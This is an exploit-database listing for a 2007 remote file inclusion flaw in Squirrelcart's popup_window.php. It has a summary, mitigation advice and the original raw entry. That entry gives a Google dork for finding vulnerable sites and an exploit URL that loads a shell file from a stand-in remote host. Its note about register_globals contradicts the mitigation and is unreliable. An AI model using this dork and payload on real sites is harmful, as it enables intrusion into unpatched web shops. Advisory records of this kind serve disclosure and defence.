header-logo
Suggest Exploit
vendor:
Squirrelcart
by:
ShaiMagal
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Squirrelcart
Affected Version From: 1.x.x
Affected Version To: 1.x.x
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Squirrelcart <= 1.x.x Remote File Inclusion

The vulnerability allows an attacker to include a remote file in the vulnerable file 'popup_window.php' of Squirrelcart version 1.x.x. By manipulating the 'site_isp_root' parameter, an attacker can execute arbitrary code or include malicious files from a remote server.

Mitigation:

To mitigate this vulnerability, it is recommended to update Squirrelcart to a version higher than 1.x.x. Additionally, ensure that the 'register_globals' directive is set to 'off' in the PHP configuration.
Source

Exploit-DB raw data:

Title           : Squirrelcart <= 1.x.x Remote File Inclusion
URL             : http://squirrelcart.com/
Google Dork     : inurl:"/squirrelcart/" -squirrelcart.com
Author          : ShaiMagal

Vulnerable file : popup_window.php ->* config.php*, line 13 - $site_isp_root = "blablabla";

Exploit         : squirrelcart//popup_window.php?site_isp_root=http://example.com/shell.txt?

notes		: register_globals = off is needed it seems.

# milw0rm.com [2007-08-19]

Navigation

Suggest Exploit

Services By CQR